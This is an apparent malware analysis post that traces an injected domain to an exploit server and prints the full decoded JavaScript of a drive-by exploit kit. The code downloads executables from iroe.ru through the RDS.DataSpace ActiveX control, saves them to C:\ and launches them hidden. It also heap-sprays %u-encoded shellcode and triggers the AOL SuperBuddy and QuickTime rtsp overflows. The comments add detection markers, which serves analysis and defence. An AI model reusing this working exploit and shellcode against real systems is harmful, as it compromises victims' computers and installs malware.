analysis of www.h23f.ru/ngg.js

This injected domain loads an iframe whose src points to http://iroe.ru/cgi-bin/index.cgi?ad

domain comparison of iroe.ru and cashtransfers.tk

;; ANSWER SECTION:
http://www.h23f.ru.        600    IN    A    205.243.117.95
http://www.h23f.ru.        600    IN    A    76.22.173.185
http://www.h23f.ru.        600    IN    A    190.16.220.86
http://www.h23f.ru.        600    IN    A    79.85.67.175
http://www.h23f.ru.        600    IN    A    199.1.137.126
http://www.h23f.ru.        600    IN    A    60.48.105.62
http://www.h23f.ru.        600    IN    A    189.31.190.46
http://www.h23f.ru.        600    IN    A    70.45.157.146
http://www.h23f.ru.        600    IN    A    76.16.6.14
http://www.h23f.ru.        600    IN    A    98.148.158.27
http://www.h23f.ru.        600    IN    A    64.30.123.37
http://www.h23f.ru.        600    IN    A    67.61.72.248
http://www.h23f.ru.        600    IN    A    66.97.50.37
http://www.h23f.ru.        600    IN    A    74.64.32.141
http://www.h23f.ru.        600    IN    A    88.187.57.51

;; ANSWER SECTION:
cashtransfers.tk.    600    IN    A    70.45.157.146
cashtransfers.tk.    600    IN    A    189.31.190.46
cashtransfers.tk.    600    IN    A    76.22.173.185
cashtransfers.tk.    600    IN    A    64.30.123.37
cashtransfers.tk.    600    IN    A    74.64.32.141
cashtransfers.tk.    600    IN    A    67.61.72.248
cashtransfers.tk.    600    IN    A    98.148.158.27
cashtransfers.tk.    600    IN    A    76.16.6.14
cashtransfers.tk.    600    IN    A    60.48.105.62
cashtransfers.tk.    600    IN    A    199.1.137.126
cashtransfers.tk.    600    IN    A    66.97.50.37
cashtransfers.tk.    600    IN    A    190.16.220.86
cashtransfers.tk.    600    IN    A    79.85.67.175
cashtransfers.tk.    600    IN    A    88.187.57.51
cashtransfers.tk.    600    IN    A    205.243.117.95

yep…the same IPs

here is the decoded JS for http://iroe.ru/cgi-bin/index.cgi?ad


/**
 * Builds a random string of the requested length from a fixed alphabet
 * (lowercase a-z without "j", plus the digits 0-9). The dropper uses it to
 * pick a throwaway file name. Math.random() is not cryptographically secure,
 * which does not matter here but makes the output guessable in principle.
 * @param {number} Xny3hPRJ - number of characters to produce
 * @returns {string} random string of length Xny3hPRJ (empty for 0 or negative)
 */
function aGLG9whi(Xny3hPRJ)
{
var alphabet = "abcdefghiklmnopqrstuvwxyz0123456789";
var chosen = [];
var count = 0;
while (count < Xny3hPRJ) {
var pick = Math.floor(Math.random() * alphabet.length);
chosen.push(alphabet.charAt(pick));
count++;
}
return chosen.join('');
}

/**
 * Obtains an automation object through the supplied host object.
 * Evaluates the string "RzTtV3MF=Rs7l7a7H.<call>" for each call form in
 * WvtqthUf (CreateObject / GetObject with different argument shapes) until
 * one leaves RzTtV3MF non-null; every exception is swallowed and the next
 * form is tried. In this script Rs7l7a7H is the <object> element created in
 * gkczTQqG, so this is the step that presumably turns the ActiveX control
 * into a factory for arbitrary ProgIDs — the recognisable pattern here is
 * eval() of CreateObject/GetObject against an <object> element.
 * @param {Object} Rs7l7a7H - host object expected to expose CreateObject/GetObject
 * @param {string} vIFmGBJa - ProgID to instantiate (e.g. "ADODB.Stream")
 * @returns {Object|null} the instantiated object, or null if every form failed
 */
function YP2JTGGZ(Rs7l7a7H, vIFmGBJa)
{
var RzTtV3MF = null;
// Prefix of the eval'd statement; each entry of WvtqthUf is appended to it.
var dqLGxA6t = 'RzTtV3MF=Rs7l7a7H.';
var WvtqthUf = new Array(
'CreateObject(vIFmGBJa)',
'CreateObject(vIFmGBJa, "")',
'CreateObject(vIFmGBJa, "", "")',
'GetObject("", vIFmGBJa)',
'GetObject(vIFmGBJa, "")',
'GetObject(vIFmGBJa)'
);

var NyBzEnWI=0;

// Stop at the first call form that produces an object.
while(!RzTtV3MF && NyBzEnWI < WvtqthUf.length) {
try {
eval(dqLGxA6t+WvtqthUf[NyBzEnWI]);
} catch(e) { }

NyBzEnWI++;
}

return RzTtV3MF;
}

/**
 * Performs a synchronous HTTP GET through an XMLHTTP-style object.
 * No status code is checked, so whatever body the server returns
 * (including an error page) is handed back as the "payload".
 * @param {Object} P_hlzvtY - XMLHTTP object obtained in gkczTQqG
 * @param {string} asEuZKlS - URL to fetch
 * @returns {*} responseBody on success; 0 if open()/send() threw
 */
function e2fBe_Sv(P_hlzvtY, asEuZKlS)
{

try {
// Third argument false = synchronous request.
P_hlzvtY.open("GET", asEuZKlS, false);
P_hlzvtY.send(null);

} catch(e) { return 0; }

return P_hlzvtY.responseBody;
}

/**
 * Writes binary data to disk through an ADODB.Stream object.
 * Type 1, Mode 3 and SaveToFile option 2 are the ADODB.Stream constants for
 * binary content, read/write mode and create-or-overwrite respectively.
 * @param {Object} OfUNuQDc - ADODB.Stream object obtained in gkczTQqG
 * @param {string} UbPIFLFD - destination file path
 * @param {*} MhBs75Rh - binary content (the responseBody from e2fBe_Sv)
 * @returns {number} 1 on success, 0 if any step threw
 */
function sZQzVcSj(OfUNuQDc, UbPIFLFD, MhBs75Rh)
{

try {
OfUNuQDc.Type = 1;
OfUNuQDc.Mode = 3;
OfUNuQDc.Open();
OfUNuQDc.Write(MhBs75Rh);
OfUNuQDc.SaveToFile(UbPIFLFD, 2);
OfUNuQDc.Close();
} catch(e) { return 0; }

return 1;
}

/**
 * Download-and-execute step: fetches TFuCJ1qH, writes it to a randomly
 * named .exe in the root of C:\ and launches it with a hidden window.
 * Host artefacts for detection: a 6-character random-name .exe dropped
 * directly in C:\ and a process started from it by the browser.
 * @param {string} TFuCJ1qH - payload URL
 * @param {Object} P_hlzvtY - XMLHTTP object used for the download
 * @param {Object} OfUNuQDc - ADODB.Stream object used to write the file
 * @param {Object} VMYEzzGn - WScript.Shell when YQo73fEW is 0, otherwise Shell.Application
 * @param {number} YQo73fEW - selects Run() (0) or ShellExecute() (non-zero)
 * @returns {number} 1 if the launch call returned without throwing, else 0
 */
function Z_BXdDKb(TFuCJ1qH, P_hlzvtY, OfUNuQDc, VMYEzzGn, YQo73fEW)
{
var fgj7JSJJ = 0;
var uOfcyPZO = e2fBe_Sv(P_hlzvtY, TFuCJ1qH);

if (uOfcyPZO != 0) {
// e.g. "c:\abc123.exe" — six random characters from aGLG9whi.
var R3w3ppXY = "c:\\"+aGLG9whi(6)+".exe";

if (sZQzVcSj(OfUNuQDc, R3w3ppXY, uOfcyPZO) == 1) {
if (YQo73fEW == 0) {
try {
// WScript.Shell.Run; second argument 0 = hidden window.
VMYEzzGn.Run(R3w3ppXY, 0);
fgj7JSJJ = 1;
} catch(e) { }
} else {
try {
// Shell.Application.ShellExecute with verb "open"; last argument 0 = hidden.
VMYEzzGn.ShellExecute(R3w3ppXY, "", "", "open", 0);
fgj7JSJJ = 1;
} catch(e) { }
}
}
}

return fgj7JSJJ;
}

/**
 * First exploitation path. Creates an <object> with classid
 * BD96C556-65A3-11D0-983A-00C04FC29E36 (commonly identified as the MDAC
 * RDS.DataSpace control) and uses it, via YP2JTGGZ, as a factory for an
 * XMLHTTP object, an ADODB.Stream and a shell object. With all three in
 * hand it calls Z_BXdDKb for two payload URLs, UoiwEYdP + "0" and
 * UoiwEYdP + "1". Everything is inside one try/catch, so on a host where
 * the control is absent or blocked it silently returns 0 and the caller
 * (bottom of the script) moves on to the next exploit.
 * @returns {number} 1 if at least one payload was launched, else 0
 */
function gkczTQqG()
{
var kYI_Pf9u = 0;
// Number of payload URLs to try (suffixes "0" and "1").
var JsKG4eip = 2;
var UoiwEYdP = "http://iroe.ru/cgi-bin/index.cgi?ff0ff0530100f0600277e0ed58060000000002b786a9670002080400000000020";
// [0] = XMLHTTP object, [1] = ADODB.Stream, [2] = shell object.
var phDJOHDS = new Array(null, null, null);

try {
// 0 = WScript.Shell obtained, 1 = fell back to Shell.Application.
var e0bEKCQI = 0;
var aLcWwrqq = document.createElement("object");
aLcWwrqq.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

if (aLcWwrqq) {
// Three XMLHTTP ProgIDs are tried in turn.
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "msxml2.XMLHTTP");
if (!phDJOHDS[0])
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "Microsoft.XMLHTTP");

if (!phDJOHDS[0])
phDJOHDS[0] = YP2JTGGZ(aLcWwrqq, "MSXML2.ServerXMLHTTP");

phDJOHDS[1] = YP2JTGGZ(aLcWwrqq, "ADODB.Stream");

phDJOHDS[2] = YP2JTGGZ(aLcWwrqq, "WScript.Shell");

if (!phDJOHDS[2]) {
phDJOHDS[2] = YP2JTGGZ(aLcWwrqq, "Shell.Application");
if (phDJOHDS[2]) e0bEKCQI = 1;
}
}

// Only proceed when download, write and execute primitives all exist.
if (phDJOHDS[0] && phDJOHDS[1] && phDJOHDS[2]) {
for(var XAuKF1LM=0;XAuKF1LM<JsKG4eip;XAuKF1LM++) {
var bKiNFTAV = Z_BXdDKb(UoiwEYdP+XAuKF1LM.toString(), phDJOHDS[0], phDJOHDS[1], phDJOHDS[2], e0bEKCQI);

// Remember the first success; both URLs are attempted regardless.
if (!kYI_Pf9u)
kYI_Pf9u = bKiNFTAV;
}
}

} catch(e) {}

return kYI_Pf9u;
}

/**
 * Drops marker cookies on the current document: "id" when XDLhUucH is
 * truthy and "addt" when burkvnnv is truthy, both with path=/ and an
 * expiry 120000 days out. The callers in this script pass a single
 * argument (9 from ly3zcjzm, 6 from CwuYh_uX), so in practice only "id"
 * is written and its value records which exploit path was used — a useful
 * artefact when triaging an affected browser profile.
 * @param {*} XDLhUucH - value for the "id" cookie (skipped when falsy)
 * @param {*} burkvnnv - value for the "addt" cookie (skipped when falsy)
 */
function sYExjgeL(XDLhUucH, burkvnnv)
{
try {

var DuqU1csl = new Date();
DuqU1csl.setDate(DuqU1csl.getDate() + 120000);

if (XDLhUucH) {
document.cookie =
"id=" + XDLhUucH +
"; path=/" +
"; expires=" + DuqU1csl.toGMTString();
}

if (burkvnnv) {
document.cookie =
"addt=" + burkvnnv +
"; path=/" +
"; expires=" + DuqU1csl.toGMTString();
}

} catch(e) {
}
}

// Shared spray state. BeAETiyl receives the sprayed strings built in
// uCCyZWgp; SYE4eNdo is set to 1 after the spray so it runs only once even
// though two exploit paths (ly3zcjzm, CwuYh_uX) request it.
var BeAETiyl = new Array();
var SYE4eNdo = 0;

/**
 * Self-rescheduling 100 ms timer that never stops. The assignment
 * BeAETiyl = BeAETiyl is a no-op; the timer presumably exists only to keep
 * the sprayed array referenced from live code while the exploit triggers.
 * Started once by uCCyZWgp.
 */
function gLaEWFff()
{
BeAETiyl = BeAETiyl;
setTimeout(gLaEWFff, 100);
}

/**
 * Grows a string by repeated self-concatenation until twice its length is
 * at least C6AEzFsm, then truncates it to C6AEzFsm/2 characters. In this
 * script it produces the padding placed in front of each sprayed block.
 * With a positive C6AEzFsm and an empty seed the loop would never end.
 * @param {string} hX2fbMfA - seed string to repeat
 * @param {number} C6AEzFsm - target size in bytes; the result has C6AEzFsm/2 UTF-16 units
 * @returns {string} the padded and truncated string
 */
function mGMmPj3P(hX2fbMfA, C6AEzFsm)
{
var grown = hX2fbMfA;
for (;;) {
if (grown.length * 2 >= C6AEzFsm) break;
grown = grown + grown;
}
return grown.substring(0, C6AEzFsm / 2);
}

/**
 * Heap spray, run at most once (guarded by SYE4eNdo). Fills the global
 * BeAETiyl with strings of roughly 0x400000 bytes, each consisting of
 * 0x0c0c0c0c padding from mGMmPj3P followed by the %u-encoded shellcode
 * in qUHpo_ky. The block count is chosen so the fill reaches 0x0c0c0c0c,
 * the same value that ly3zcjzm and CwuYh_uX hand to the vulnerable
 * controls. Finishes by starting the gLaEWFff timer. Always returns 0.
 * For detection, the %u-encoded unescape() blob, the 0x0c0c0c0c constant
 * and the 0x400000 block size are the recognisable markers of this pattern.
 * @returns {number} always 0
 */
function uCCyZWgp()
{
if (!SYE4eNdo) {
// Target address the spray is sized to reach.
var NiQH7U5I = 0x0c0c0c0c;
// Shellcode, %u-encoded so unescape() yields raw UTF-16 code units.
var qUHpo_ky = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018e%u0000%u97b0%u4530%u4500%u7549%uebf9%u0700%u0707%u0707%u0707%u7e07%u976b%u9797%uf3c8%ua736%u9797%uef97%u1c9b%u9bd7%ue71c%u3a8b%uff1c%u7c9f%u1c9e%ua3d7%ud71a%u1ceb%uabff%u601c%u93fd%u7fce%u9718%u9797%u6e75%uf8ff%u97f9%uff97%ue5e2%ufafb%u68c3%u1c81%u7f7f%u97ee%u9797%u401c%u17d0%u97a8%u6de2%uc0d0%u17d0%u97a8%u6de2%u781c%ua4c8%u165e%u937b%u9796%u1c97%uc64b%uc4c5%u93ff%u9796%u6897%u9bc1%ucecd%uc5c6%u951c%ud4c4%uac17%ue297%u166d%u6bec%uf2b9%uf2ef%u94e2%u7c14%u1e9f%u5094%u93d4%uf2b9%uf2ef%ud451%u979f%u1dcc%u9356%u1fa7%u97d2%u57a4%uc7c7%uc0c4%u68c7%u87c1%u6f14%ue297%ufd91%uc496%uc168%ucd93%u14ce%u9355%u17d6%u97ad%u23e2%uc168%uc69f%u1cc1%uabe2%ue31c%uefb9%u6294%u1cc1%ub7e1%u6294%u5ea4%ud6de%u943a%ua452%u984c%u8729%u41ad%u9fe3%u5c56%u949a%ud74d%u667c%u88ac%u70e2%u1cc9%ub3c9%u4a94%u1cf1%udc9b%uc91c%u948b%u1c4a%u1c93%u5294%uc93c%u54ce%u687f%u6869%u1968%u99d9%u0f7b%u1d69%ue999%u754f%ua4e4%u1d5d%ua1cc%ub88d%ufde7%udaf2%uc0f2%uc5f3%u97e4%ue3ff%ue7e3%ub8ad%ufeb8%uf8e5%ub9f2%ue2e5%uf4b8%ufef0%uf5ba%uf9fe%ufeb8%uf3f9%ueff2%uf4b9%ufef0%uf1a8%ua7f1%uf1f1%ua2a7%ua7a4%ua7a6%uf1a7%ua1a7%ua7a7%ua0a5%uf2a0%uf2a7%ua2f3%ua7af%ua7a1%ua7a7%ua7a7%ua7a7%ua7a7%uf5a5%uafa0%uf6a1%ua1ae%ua7a0%ua7a7%ua7a5%ua7af%ua7a3%ua7a7%ua7a7%ua7a7%ua7a7%ua7af%u0097");
// Size of one sprayed block in bytes (4 MiB).
var teKRkTip = 0x400000;
// Shellcode size in bytes: two bytes per UTF-16 unit.
var f0xyzFZU = qUHpo_ky.length * 2;
// Padding size so padding + shellcode fills one block; the extra 0x38
// presumably accounts for string object overhead — not verifiable here.
var C6AEzFsm = teKRkTip - (f0xyzFZU+0x38);
// Two UTF-16 units of 0x0c0c, i.e. the bytes 0c 0c 0c 0c, used as padding seed.
var hX2fbMfA = unescape("%u0c0c%u0c0c");

hX2fbMfA = mGMmPj3P(hX2fbMfA,C6AEzFsm);
// Number of 0x400000-byte blocks between 0x400000 and the target address.
var mNxJ2bIw = (NiQH7U5I - 0x400000)/teKRkTip;

for (var E1gS4q9w=0;E1gS4q9w<mNxJ2bIw;E1gS4q9w++) {
BeAETiyl[E1gS4q9w] = hX2fbMfA + qUHpo_ky;
}

SYE4eNdo = 1;
gLaEWFff();
}

return 0;
}

/**
 * Second exploitation path, targeting the "Sb.SuperBuddy" ActiveX control
 * (an AOL component). If the control instantiates, it runs the heap spray,
 * drops the marker cookie id=9 via sYExjgeL, and calls LinkSBIcons with
 * 0x0c0c0c0c — the address the spray was sized to reach. Any failure is
 * swallowed. Always returns 0, so the caller's || chain continues to
 * CwuYh_uX whether or not this fired.
 * @returns {number} always 0
 */
function ly3zcjzm() {

try {
var AwhjrUHt = new ActiveXObject('Sb.SuperBuddy');

if (AwhjrUHt) {
uCCyZWgp();
sYExjgeL(9);
AwhjrUHt.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

/**
 * Third exploitation path, targeting "QuickTime.QuickTime.4". If the
 * control instantiates, it runs the heap spray, builds an over-long string
 * (803 "A" characters followed by twelve 0x0c bytes) and injects an
 * <object> element whose "qtnext1" parameter carries that string inside an
 * rtsp:// URL, with the "src" pointing at another iroe.ru URL. The marker
 * cookie id=6 is dropped just before the element is appended. Any failure
 * is swallowed. Always returns 0.
 * @returns {number} always 0
 */
function CwuYh_uX()
{
try {
var IHSFEQdb = new ActiveXObject("QuickTime.QuickTime.4");

if (IHSFEQdb) {
uCCyZWgp();
var sQnPnlXi = "";
// 200 * "AAAA" + "AAA" = 803 filler characters.
for(var RsmxizaD=0;RsmxizaD<200;RsmxizaD++) {
sQnPnlXi += "AAAA";
}

sQnPnlXi += "AAA";

// Followed by 3 * 4 = 12 bytes of 0x0c, matching the spray constant.
for(var RsmxizaD=0;RsmxizaD<3;RsmxizaD++) {
sQnPnlXi += "\x0c\x0c\x0c\x0c";
}

var SauSTYcf =
'<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="200" height="200">' +
'<param name="src" value="http://iroe.ru/cgi-bin/index.cgi?ff0ff0530100f0600177e0ed58060000000002b786a967000208040000000006">' +
'<param name="type" value="image/x-quicktime">' +
'<param name="autoplay" value="true">' +
'<param name="qtnext1" value="<rtsp://AXDOF:' + sQnPnlXi +
'>T<myself>">' +
'<param name="target" value="myself">' +
'</object>';

// Assigns an undeclared global (no var). The commented-out code at the end
// of the script checks document.h74xHwKE instead, which this never sets.
h74xHwKE = 0;
var yNvHA7JL = document.createElement("div");
yNvHA7JL.innerHTML = SauSTYcf;
sYExjgeL(6);
document.body.appendChild(yNvHA7JL);

}
} catch(e) {
}

return 0;
}
// Entry point: the three exploit paths run left to right; || short-circuits
// only if gkczTQqG returns 1, since ly3zcjzm and CwuYh_uX always return 0.
// Both branches assign the same value, so document.xQ1dprWk is always
// 'about:blank' regardless of outcome.
if (gkczTQqG() || ly3zcjzm() || CwuYh_uX()
) {
document.xQ1dprWk = 'about:blank';
} else {
document.xQ1dprWk = 'about:blank';
}

/*setTimeout(function() {
if (document.h74xHwKE && document.ap8vC3pc && document.KUMTMmzi) {
setTimeout("window.location = '" + document.xQ1dprWk + "';", 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

Here is the VT analysis of one of the malware samples.
